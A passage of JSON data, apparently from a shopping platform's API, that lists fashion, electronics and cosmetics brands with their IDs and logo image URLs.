Choo","type":0,"logoUrl":"https://du.hupucdn.com/news_byte18060byte_e664bd98b2a590c464e0e154b5f9ce53_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1310,"brandName":"Champion","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21403byte_6995f22e76a1a203f4f4dfd3ff43c21b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":176,"brandName":"Converse","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8272byte_078b04a261c1bb1c868f1522c7ddcefc_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":2,"brandName":"Puma","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26564byte_a768870ae48f1a216dd756c2206c34b1_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":4,"brandName":"New Balance","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6189byte_1cb7717a44b335651ad4656610142591_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":7,"brandName":"Under Armour","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21646byte_0bd049d8c27c8509f3166d68a388dfe9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":9,"brandName":"Vans","type":0,"logoUrl":"https://du.hupucdn.com/news_byte9507byte_49aaeb534cecab574949cf34b43da3a5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":33,"brandName":"李宁","type":0,"logoUrl":"https://du.hupucdn.com/news_byte7350byte_d60fa387aac42cb8c9b79700d720397d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":4981,"brandName":"JRs","type":0,"logoUrl":"https://du.hupucdn.com/news_byte5113byte_7a651984f882e48df46c67758d6934d2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10027,"brandName":"Dickies","type":0,"logoUrl":"https://du.hupucdn.com/news_byte37984byte_e8d6f32f6b17f736a422fac90c99d7e5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10113,"brandName":"ANTI SOCIAL SOCIAL CLUB","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28476byte_863a194b02da977009144bd9f10dde1f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":843,"brandName":"CASIO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte4156byte_4d3d1a6e2beca7f700e1ac92ea6b2fdf_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10141,"brandName":"UNDEFEATED","type":0,"logoUrl":"https://du.hupucdn.com/news_byte16826byte_6d7166e0081d6b42619e54ca06900406_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10250,"brandName":"NINTENDO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29039byte_b5b91acfeaf88ec0c76df08b08e6e5cd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10001,"brandName":"Thrasher","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30750byte_446d35e36b912ad366d8f72a6a9cc5e4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10021,"brandName":"Cav Empt","type":0,"logoUrl":"https://du.hupucdn.com/news_byte61774byte_7a5969f3694fc71f727c63e8bc3d95d5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10032,"brandName":"Burberry","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27771byte_9031f22329273c84170de8aa0f7d7c67_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10037,"brandName":"C2H4","type":0,"logoUrl":"https://du.hupucdn.com/news_byte42973byte_8681e3b6092a4dbf6938621cb28e75f4_w284h284.png"},"seriesList":[]},{"brand":{"goodsBrandId":10043,"brandName":"Mitchell & Ness","type":0,"logoUrl":"https://du.hupucdn.com/news_byte35794byte_37e1d65f0c9df1c61c217bded6435b9d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10046,"brandName":"Moncler","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27878byte_9066687c9718c1168f8846653018a935_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1860,"brandName":"THOM BROWNE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte7866byte_fc0d1f01af88a3425bb106fe21f720a9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10062,"brandName":"VLONE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte38175byte_da7a862bd765220eb9bb00efbf5cfab3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10072,"brandName":"HUAWEI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte53433byte_8949768c520c73adfd0798c7416ff642_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10073,"brandName":"Canada Goose","type":0,"logoUrl":"https://du.hupucdn.com/news_byte40959byte_26901c3ba55661a1ea668d49c599e86b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1131,"brandName":"隐蔽者","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28746byte_5a165d2728e81983d7bbd59739e56b97_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10095,"brandName":"FMACM","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21768byte_8480a963cd231f2ea4ec032753238cd9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10098,"brandName":"Onitsuka Tiger","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27415byte_63662423bde0d02cb8576ff47afb270d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10103,"brandName":"Guuka","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29973byte_ef6eeef0535a0c9b2ade4fb6efc0aa06_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":634,"brandName":"A BATHING APE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8375byte_cedf2c6ad46d2ac60f0c2f86cbccffcd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10115,"brandName":"Mishkanyc","type":0,"logoUrl":"https://du.hupucdn.com/news_byte34270byte_f4816f6a78ea1e528144fadcaf671db6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10119,"brandName":"AMBUSH","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22861byte_44dadd412d9c0b3c57f0d382f5554f5c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10120,"brandName":"CDG Play","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30859byte_4b1af0b2a9bc9007a3f0c5385fea1f8d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10164,"brandName":"GOTNOFEARS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22932byte_c11b6cb93dc1f26ee98d44db6017c522_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10172,"brandName":"THE NORTH FACE PURPLE LABEL","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22025byte_ce1dc9be1690240e01f1365eedac1362_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10186,"brandName":"Subcrew","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23252byte_48b6f7f61cad6c18fb7adafe9696ef1f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10243,"brandName":"Aftermaths","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20974byte_9b01f95cba8e542a258ccc7f1ccf9647_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10248,"brandName":"Aape","type":0,"logoUrl":"https://du.hupucdn.com/news_byte34614byte_beb0b973078c0e17171edea6cd0c715d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10263,"brandName":"apm monaco","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28592byte_384295707fe8076c1cc738402f3b928b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":6,"brandName":"Reebok","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8192byte_cda902674ee7d4d4c51d32b834a76e7b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10264,"brandName":"DUEPLAY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20052byte_41e361c6d2df6895d3b38dfdd9c2efa9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":577,"brandName":"PALACE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8691byte_5577b630f2fd4fcb8d6f7f45071acc40_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10000,"brandName":"ROARINGWILD","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21733byte_bf73cc451933ed2392d31620c08f76d6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1222,"brandName":"NOAH","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33752byte_11638ecd79b8d3c7fd29b92dfb9f5f5b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10030,"brandName":"Carhartt WIP","type":0,"logoUrl":"https://du.hupucdn.com/news_byte9975byte_222768bbe7d7daffed18c85090de6153_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10298,"brandName":"BANU","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24263byte_c480365559a6a9808a69547bc8084579_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10357,"brandName":"EQUALIZER","type":0,"logoUrl":"https://du.hupucdn.com/news_byte18391byte_b300fb77b24a776296bc7a92873d1839_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10075,"brandName":"RIPNDIP","type":0,"logoUrl":"https://du.hupucdn.com/news_byte35669byte_5e1b7e4e57ee4568bfb9bf657c8146c5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10087,"brandName":"Stussy","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30589byte_c37b4863d6248dd92a588696c9e1dfe5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10092,"brandName":"NPC","type":0,"logoUrl":"https://du.hupucdn.com/news_byte5399byte_249e0a587b457f46e7e6bad9fd7234bc_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10118,"brandName":"Red Charcoal","type":0,"logoUrl":"https://du.hupucdn.com/news_byte19757byte_91817a270103c441138260ad9812f1d8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10106,"brandName":"Dior","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21672byte_cfe86702e27c9870189b6ad6a7f795b8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":65,"brandName":"Apple","type":0,"logoUrl":"https://du.hupucdn.com/news_byte1253byte_c8fcc08b731e30d4d1453c77bb4417d7_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10039,"brandName":"Randomevent","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22681byte_d422ea97ad63fe2718dc0a3208602adb_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10260,"brandName":"Swarovski","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29555byte_630db5e96d66e6f5287c293cd78caf27_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10010,"brandName":"PRADA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21018byte_f70b725f896e7d48d7cf5de27efb693a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10107,"brandName":"UNIQLO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22384byte_3363df740785c4f46ff7e9e60732d44c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10173,"brandName":"HIPANDA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30445byte_c66a18c65a8fed91a6790c51b4742f5a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10219,"brandName":"HUMAN MADE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte37800byte_decdf76555f22cb831ac23e08ab2018b_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10348,"brandName":"PINKO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21540byte_a15095f6f394d948ae5ab220d8d1a122_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10349,"brandName":"ISSEY MIYAKE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21345byte_f151d2b6a79e5f9189d3edeb5febd68d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10094,"brandName":"HERON PRESTON","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21445byte_263c6af2c24fe8eb020f2fad8956aae6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10217,"brandName":"HARSH AND CRUEL","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27648byte_68693ca8aa0d93a7bc4efacf7131a1d0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10229,"brandName":"COACH","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22573byte_2d963bacc8403d3bff0f44edd04dab64_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10230,"brandName":"MICHAEL KORS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21530byte_ae96688098a3d529824fa5cb71bf3765_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10273,"brandName":"XLARGE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte38276byte_061c84c498eadd44eb11704a5420f785_w688h628.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10012,"brandName":"Balenciaga","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25051byte_c9098ab23afe7e5b2ebbe5bbe02cf20b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10097,"brandName":"New Era","type":0,"logoUrl":"https://du.hupucdn.com/news_byte12037byte_2650d81fe891a08f41ba8ef58f92e4c8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10236,"brandName":"UNDER GARDEN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21683byte_ebeac156f070e9f48e74e13567a908ad_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10216,"brandName":"Suamoment","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26349byte_999d4032e637fbccca3aaf6db95ef2ea_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":8,"brandName":"Asics","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3352byte_31e3a9553fef833c3004a84c4c016093_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10261,"brandName":"TIFFANY & CO.","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21293byte_6af55972221b24da968a1b9957080c1e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10045,"brandName":"CHANEL","type":0,"logoUrl":"https://du.hupucdn.com/news_byte32784byte_b947def32e782d20594230896ad2b342_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10302,"brandName":"alexander wang","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20702byte_4635ead9077fefadaf9875638452a339_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10347,"brandName":"MLB","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21412byte_ba8096a44748f1e896828a6d1196f571_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10191,"brandName":"BEASTER","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23781byte_319f230d9345cd5154b908631d2bb868_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10245,"brandName":"izzue","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21393byte_cf5140071b8824d433f4b32a51d49220_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10257,"brandName":"FIVE CM","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22092byte_3cd80b1e49ad6bd28e5e371327424532_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10262,"brandName":"Acne Studios","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26766byte_8e0cc00c1fccd1958d56b008370107cc_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":4984,"brandName":"得物","type":0,"logoUrl":"https://du.hupucdn.com/news_byte1528byte_5fd1d0d6bd3ff23d2b6c0d2933da1b8e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10235,"brandName":":CHOCOOLATE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21808byte_2418d1805f60850c961c31ea40982ed2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10096,"brandName":"PALM ANGELS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22102byte_3d85af8f2d0566d7a1620404f9432be5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1302,"brandName":"WTAPS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte5814byte_ce947464a6105c6aef7d7fb981aaa61e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":4983,"brandName":"NEIGHBORHOOD","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3804byte_316eb37426516d3cf8252fcbab6aa0cf_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10024,"brandName":"BANDAI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte41491byte_d575b1bce5ab5754ea2444c0bb415782_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":2389,"brandName":"LEGO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33157byte_7e92ea9e2640626b9d52ce2a9fd2a75c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10224,"brandName":"DANGEROUSPEOPLE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27331byte_fd65dfa6630e179a1bed93573a9b32cb_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10241,"brandName":"Acupuncture","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26897byte_26ec3a3b2f532353a635cff0752eb743_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10255,"brandName":"MITARBEITER(IN)","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21741byte_058a1342e063fbb9fd341a1f3aca48a6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1318,"brandName":"FILA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24479byte_79cb074cf3d73a420d75a435aee91fe2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10315,"brandName":"SANKUANZ","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23445byte_3e251bad0695be109b037d80b9908e2a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10221,"brandName":"*EVAE+MOB","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22561byte_e52e3571b938f7027d4ea5ce1c406cb8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10226,"brandName":"BABAMA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23766byte_8a0dcd76a4e7032a66209f40d0b6ec85_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10228,"brandName":"OMTO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23242byte_06cc9e12bd4efdf4d1885c401c224e10_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10237,"brandName":"OMT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24518byte_6be637e798e477e8c2e9e7d502e59b25_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10244,"brandName":"VERAF CA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22401byte_7c150e55199eb32e12bb29f01ed6c801_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":34,"brandName":"安踏","type":0,"logoUrl":"https://du.hupucdn.com/news_byte925102byte_5d9ca8cebc2286d70ef66f4f4a8f2983_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10210,"brandName":"CDG","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20964byte_54ad49c012c262b02805451b9462f481_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10369,"brandName":"× × DESIGN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21649byte_f3502bde5ec295493f6b1ffff54fdad9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10017,"brandName":"PLACES+FACES","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22034byte_87c416321487ad3071b2e886690b6c83_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10020,"brandName":"VERSACE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17169byte_7a363914e3e65ddcab341f2088451861_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10022,"brandName":"LONGINES","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3779byte_b43ce49900670dcd8855801cd4ecbc3e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10029,"brandName":"McQ","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20529byte_0a3c77e055b5ea67e5dd976e0ae15ef9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10031,"brandName":"Alpha Industries","type":0,"logoUrl":"https://du.hupucdn.com/news_byte10726byte_a964cf670ceeb6e83dd7dc74670d2d0e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10033,"brandName":"Hasbro","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33084byte_6ee0b3af2fe9007bd43d7e43b2d9cbcd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10048,"brandName":"Boy London","type":0,"logoUrl":"https://du.hupucdn.com/news_byte12032byte_dc8badd06954530bab52bee2dcd2281e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10053,"brandName":"MOSCHINO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3922byte_e6fed7cc9d76aaed983119b1f6ea4da2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10099,"brandName":"VEJA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27380byte_01358f743e3668ee4f860cc03c6cee71_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10105,"brandName":"GAON","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24582byte_5dc995e735d926f10686a3b2e4f99ffe_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10110,"brandName":"EDCO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25568byte_4c07bb13aeb5e88d127f5f30b0582ed2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10111,"brandName":"FYP","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24609byte_694a64457745672bd4e7b657b6753993_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10125,"brandName":"OPPO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25629byte_7fb979a04f572beaa96b0583f4204748_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10130,"brandName":"Corade","type":0,"logoUrl":"https://du.hupucdn.com/news_byte5181byte_7a202830db26f4d93c565e2cc1e0af4d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10132,"brandName":"MostwantedLab","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21748byte_4c88547590072659de8e0731fef96a4f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10135,"brandName":"PRBLMS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22576byte_910768509dbfed23275fa7989753dffd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10138,"brandName":"zippo","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28711byte_8d40191080a1a21111d66ce2ee000e90_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10142,"brandName":"UNVESNO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte2826byte_fdb1b1046cae382cfb60cac11f9b281d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10150,"brandName":"vivo","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26242byte_b829524880093cc2099d470299889c89_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10246,"brandName":"HOKA ONE ONE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26308byte_1e82701c70c29b871b630adb45dbebd3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10247,"brandName":"KEEN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30591byte_670bf1d37ce8479f3fa09a55d28dcb93_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10002,"brandName":"Y-3","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29394byte_2f32b853acb651e2831f8797fe29fbfa_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10267,"brandName":"LOCCITANE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25047byte_c8480c6f2b9a32fc3a54524146bd1165_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10013,"brandName":"Neil Barrett","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3026byte_cdeab7bf75187f17fa8c069c9a3a051a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10269,"brandName":"Charlotte Tilbury ","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23124byte_0113ad2025780a77a7f5131571ecee54_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10014,"brandName":"KENZO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte7359byte_c71c56a9aea36427f7bb106f18151548_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10270,"brandName":"BVLGARI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22644byte_9dfd426ffa4b796999f49447b6a67f13_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10271,"brandName":"Jo Malone London","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22269byte_51fd61cb797b6c2bbf0c0b84981c0948_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10016,"brandName":"Vetements","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24790byte_b66758a5ea903a5a005798f7d84d1498_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10274,"brandName":"GIORGIO ARMANI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21786byte_2857737687e9338787e5121b81e2fe27_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10019,"brandName":"Givenchy","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23368byte_51dcde3cd1f5ef90c5734249bcd17af0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10275,"brandName":"GUERLAIN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21952byte_b06c9655af8bbd85bbacd7905c856d99_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10276,"brandName":"Fresh","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29422byte_c362cefc52c99839bbf299bef133e165_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10277,"brandName":"Clé de Peau Beauté","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24675byte_c3c1c3b08d7926e82fd1681f920a955f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10278,"brandName":"LANCOME","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22324byte_41fe4c8042bfd4761df3cbde50eb1ab0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10023,"brandName":"FENDI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3735byte_363b11ad1f4b34f6b165818fe14ded88_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10279,"brandName":"Kiehls","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22486byte_39f44b549295514934db3bea8696551a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10280,"brandName":"MAC","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20822byte_0d14fc90e743b48c0d198505ac7acbbd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10026,"brandName":"Yves Saint Laurent","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29430byte_88593ab0095ed38806e07d4afd4889cf_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10282,"brandName":"LA MER","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21643byte_c2302d6ae27f2fa9569a224a49da3097_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10284,"brandName":"CLARINS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23308byte_a69c3dfc25e7a7c6400ffe44d8242a30_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10285,"brandName":"NARS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25821byte_311c624a310303b590d5d4c062f056ea_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10286,"brandName":"benefit","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25499byte_f2dadfa1b21c81b9e659300bf07e8d37_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10287,"brandName":"GLAMGLOW","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22830byte_eb7b37c9e623fc1b2ee13c291e1a29aa_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10288,"brandName":"Too Faced","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22156byte_47dd9a1fe0969e1648e912ee16cbb844_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10289,"brandName":"URBAN 